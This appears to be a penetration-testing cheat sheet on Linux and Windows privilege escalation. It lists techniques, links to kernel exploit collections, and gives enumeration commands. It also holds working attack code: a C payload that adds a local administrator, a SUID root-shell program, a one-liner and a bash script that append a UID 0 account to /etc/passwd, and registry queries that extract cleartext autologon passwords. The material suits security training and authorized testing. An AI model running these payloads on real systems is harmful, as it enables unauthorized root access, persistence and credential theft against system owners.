Privilege Escalation
https://payatu.com/guide-linux-privilege-escalation
Linux Privilege Escalation
sudo -l
Kernel Exploits
OS Exploits
Password reuse (mysql, .bash_history, 000-default.conf...)
Known binaries with suid flag and interactive (nmap)
Custom binaries with suid flag either using other binaries or with command execution
Writable files owned by root that get executed (cronjobs)
MySQL as root
Vulnerable services (chkrootkit, logrotate)
Writable /etc/passwd
Readable .bash_history
SSH private key
Listening ports on localhost
/etc/fstab
/etc/exports
/var/mail
Process as other user (root) executing something you have permissions to modify
SSH public key + Predictable PRNG
apt update hooking (Pre-Invoke)
Capabilities
Windows Privilege Escalation
Kernel Exploits
OS Exploits
Pass The Hash
Password reuse
DLL hijacking (Path)
Vulnerable services
Writable services binaries path
Unquoted service paths
Listening ports on localhost
Registry keys
Kernel Exploits
Linux: https://github.com/lucyoa/kernel-exploits
Windows: https://github.com/abatchy17/WindowsExploits
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
http://www.fuzzysecurity.com/tutorials/16.html
Windows Add User
#include <stdlib.h> /* system, EXIT_SUCCESS, EXIT_FAILURE */

/* Payload to drop where a privileged process will execute it (writable
   service binary, hijackable DLL path): creates a local user and puts it in
   the local Administrators group. Replace <username> and <password> before
   compiling. */
int main(void)
{
    int rc = system("net user <username> <password> /add && net localgroup administrators <username> /add");
    return rc == 0 ? EXIT_SUCCESS : EXIT_FAILURE;
}
SUID Change
SUID
Set owner user ID. A binary with the SUID bit runs with the file owner's effective UID, so a root-owned SUID copy of the program below hands out a root shell (compile it, then get it chown root:root and chmod 4755 through whatever root-level write you already have).
#define _GNU_SOURCE     /* setresuid() needs this with glibc */
#include <stdlib.h>     /* system, EXIT_FAILURE */
#include <unistd.h>     /* setresuid */

int main(void)
{
    /* A SUID binary starts with euid 0 but the real UID unchanged; bash drops
       privileges when they differ, so set real, effective and saved UID. */
    if (setresuid(0, 0, 0) != 0)
        return EXIT_FAILURE;
    return system("/bin/bash");
}
Privilege Escalation:
#Find Binaries that will execute as the owner
find / -perm -u=s -type f 2>/dev/null
#Find binaries that will execute as the group
find / -perm -g=s -type f 2>/dev/null
#Find sticky-bit directories (e.g. /tmp: only a file's owner may delete it there)
find / -perm -1000 -type d 2>/dev/null
find / -perm -4000 2>/dev/null
#Files writable by the current user (-writable tests your own access, not the o+w bit)
find / -writable -type f 2>/dev/null
World writeable directories
find / \( -wholename '/home/homedir*' -prune \) -o \( -type d -perm -0002 \) -exec ls -ld '{}' ';' 2>/dev/null | grep -v root
World writeable files
find / \( -wholename '/home/homedir/*' -prune -o -wholename '/proc/*' -prune \) -o \( -type f -perm -0002 \) -exec ls -l '{}' ';' 2>/dev/null
Writeable config files
find /etc/ -writable -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ld {} \; 2> /dev/null
Windows Exploit Suggester
Run systeminfo > systeminfo.txt on the target, fetch the bulletin database once with --update, then compare:
python2 windows-exploit-suggester.py --update
python2 windows-exploit-suggester.py --database 2017-10-10-mssb.xls --systeminfo ../systeminfo.txt --quiet
python windows-exploit-suggester.py --systeminfo systeminfo.txt --database 2018-11-25-mssb.xls
Windows Priv Escalation
AlwaysInstallElevated
Check that the following registry value is set to 1 in both hives (the policy only takes effect when HKCU and HKLM both have it); any user can then install an MSI package with SYSTEM privileges.
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Winlogon autologon credentials (stored in clear text in the registry):
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
Basic Linux Enumeration
Distribution type & kernel version
cat /etc/*release*
uname -a
rpm -q kernel
dmesg | grep -i linux
Default writeable directory / folder
/tmp
/dev/shm
Search for passwords
Search for password within config.php
grep -R 'password' config.php
Find possible other writeable directory / folder
find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \; 2>/dev/null
Service(s) running as root user
ps aux | grep root
ps -ef | grep root
Installed applications
ls -lah /usr/bin/
ls -lah /sbin/
dpkg -l
rpm -qa
ls -lah /var/cache/apt/archives/
ls -lah /var/cache/yum/
Scheduled jobs
crontab -l
ls -la /etc/cron*
ls -lah /var/spool/cron
ls -la /etc/ | grep cron
cat /etc/crontab
cat /etc/anacrontab
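The cron checks above, together with the "writable files owned by root that get executed" and "process as other user executing something you have permissions to modify" items in the Linux list, come down to one question: does any job run a path we can write to? The script below is an added example, not code from the original page. It parses the system crontab format (/etc/crontab and /etc/cron.d/*) and reports every absolute path on a job's command line that the current user can modify, or create if the file is missing from a directory we can write to. The crontab files to scan are passed as arguments; that is the only assumption.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: parse system-crontab files
# (format "m h dom mon dow user command", or "@reboot user command") and flag
# every absolute path on a job's command line that the current user can
# modify or create. A root job whose script is writable by you, or whose
# script is missing from a directory you can write to, runs your code as root
# on the next tick. Per-user crontabs under /var/spool/cron carry no user
# field and are not parsed here.

# Print "user<TAB>command" for every job line in the given crontab files.
cron_jobs() {
    local f
    for f in "$@"; do
        [ -r "$f" ] || continue
        awk '
            /^[ \t]*#/ { next }                         # comment
            NF == 0 { next }                            # blank line
            /^[ \t]*[A-Za-z_][A-Za-z0-9_]*=/ { next }   # SHELL=, PATH=, MAILTO=
            /^[ \t]*@/ { start = 3 }                    # @reboot user command
            !/^[ \t]*@/ { start = 7 }                   # m h dom mon dow user command
            NF >= start {
                cmd = ""
                for (i = start; i <= NF; i++) cmd = cmd (i > start ? " " : "") $i
                print $(start - 1) "\t" cmd
            }' "$f"
    done
}

# For each job, check every absolute path on its command line:
#   WRITABLE  - the file exists and we can write to it (replace its contents)
#   CREATABLE - the file is missing but its directory is writable by us
check_cron_targets() {
    local user cmd word dir words
    cron_jobs "$@" | while IFS=$'\t' read -r user cmd; do
        read -ra words <<< "$cmd"          # split on whitespace without globbing
        for word in "${words[@]}"; do
            case $word in /*) ;; *) continue ;; esac
            if [ -e "$word" ]; then
                if [ -w "$word" ]; then
                    printf '%s\t%s\tWRITABLE\n' "$user" "$word"
                fi
            else
                dir=$(dirname "$word")
                if [ -d "$dir" ] && [ -w "$dir" ]; then
                    printf '%s\t%s\tCREATABLE\n' "$user" "$word"
                fi
            fi
        done
    done
}

# On a live host:
#   check_cron_targets /etc/crontab /etc/cron.d/*
```

Every absolute path on the line is checked, not just the first word, because jobs are commonly written as /bin/sh /opt/backup.sh and the interesting target is the script, not the interpreter. The CREATABLE case covers the classic mistake of a job pointing at a script that was deleted from a directory that stayed world-writable.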
Find pattern in file:
grep -rnw '/etc/passwd' -e 'root'
Sticky bit, SGID, SUID
Sticky bit
find / -perm -1000 -type d 2>/dev/null
SGID (chmod 2000)
find / -perm -g=s -type f 2>/dev/null
SUID (chmod 4000)
find / -perm -u=s -type f 2>/dev/null
find /* -user root -perm -4000 -print 2>/dev/null
SUID or SGID (the -o must be parenthesised, otherwise -type f only applies to the SUID half)
find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null
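The finds above produce a long list on any distribution, most of it stock binaries (passwd, su, mount). What matters for the "known binaries with suid flag" versus "custom binaries with suid flag" split in the Linux list is which entries the package manager does not know about; the "capabilities" item is the same search for file capabilities. The script below is an added example, not code from the original page: it lists set-id files and file capabilities and asks dpkg or rpm which files they own, so hand-built or stray binaries stand out. It assumes either package manager may be absent (a minimal container), in which case every finding is reported as unpackaged.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: enumerate SUID/SGID files
# and file capabilities, then tag each set-id file as PACKAGED (owned by dpkg
# or rpm) or UNPACKAGED. Unpackaged set-id binaries are the custom ones to
# reverse first; packaged ones get checked against GTFOBins-style lists.
# Assumption: dpkg/rpm/getcap may be missing; the search root is a parameter
# so the functions can be exercised on a scratch directory.

# All regular files with SUID or SGID set below the given root (default /).
# -xdev stays on one filesystem so /proc, network mounts etc. are skipped.
find_setid() {
    find "${1:-/}" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Files carrying capabilities (cap_setuid, cap_dac_override, cap_sys_admin are
# the ones worth a second look); getcap comes from libcap and may be absent.
find_caps() {
    command -v getcap >/dev/null 2>&1 || return 0
    getcap -r "${1:-/}" 2>/dev/null
}

# Return 0 if a package manager owns the file, 1 otherwise.
packaged() {
    if command -v dpkg >/dev/null 2>&1; then
        dpkg -S "$1" >/dev/null 2>&1 && return 0
    fi
    if command -v rpm >/dev/null 2>&1; then
        rpm -qf "$1" >/dev/null 2>&1 && return 0
    fi
    return 1
}

# Print "mode owner:group<TAB>tag<TAB>path" for every set-id file.
triage_setid() {
    local f tag
    find_setid "$1" | while read -r f; do
        if packaged "$f"; then tag=PACKAGED; else tag=UNPACKAGED; fi
        printf '%s\t%s\t%s\n' "$(stat -c '%a %U:%G' "$f")" "$tag" "$f"
    done
}

# On a live host:
#   triage_setid | grep UNPACKAGED
#   find_caps
```

A packaged binary is not automatically safe (an old sudo or pkexec is still a kernel-exploit-style version check), but an unpackaged one in /usr/local/bin or a home directory is exactly the "custom binary using other binaries or with command execution" case and deserves strings, ltrace and a look at which PATH entries it trusts.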
Add user to /etc/passwd and root group
echo hodor::0:0:root:/root:/bin/bash >> /etc/passwd
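The one-liner above leaves field 2 empty, which only logs in without a password where the PAM configuration allows it (pam_unix nullok). The script below is an added example, not code from the original page: it builds the same UID 0 entry with a real crypt hash, which pam_unix uses directly when field 2 holds a hash instead of "x", and refuses to append if the file is not writable or the name already exists. The target file is a parameter so the procedure can be rehearsed on a copy; it assumes openssl is available for hashing, and hodor and the password are placeholders.

```bash
#!/usr/bin/env bash
# Added example, not code from the original page: append a UID 0 account to a
# writable passwd file with a proper password hash instead of an empty field.
# Assumptions: openssl is installed for hashing; the file path, user name and
# password are placeholders supplied by the caller.

# SHA-512 crypt hash ($6$...) for the password; openssl 1.1.1+ supports -6,
# older builds only -1 (MD5 crypt), which glibc crypt() still accepts.
hash_password() {
    openssl passwd -6 "$1" 2>/dev/null || openssl passwd -1 "$1"
}

# passwd entry: name:hash:uid:gid:gecos:home:shell. UID 0 makes the account
# root whatever its name; a hash in field 2 is checked directly by pam_unix.
passwd_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Append the entry to FILE if we can write it and NAME is not already taken.
add_root_user() {
    local file=$1 name=$2 hash=$3
    [ -w "$file" ] || { echo "$file is not writable" >&2; return 1; }
    if grep -q "^$name:" "$file"; then
        echo "user $name already exists in $file" >&2
        return 1
    fi
    passwd_entry "$name" "$hash" >> "$file"
}

# On a live host (then: su hodor):
#   add_root_user /etc/passwd hodor "$(hash_password 'Str0ngPassw0rd!')"
```

Verify with getent passwd hodor before trying su; if getent does not return the line, the file was not the one in use (some hosts serve passwd from LDAP or sssd and the local file is ignored).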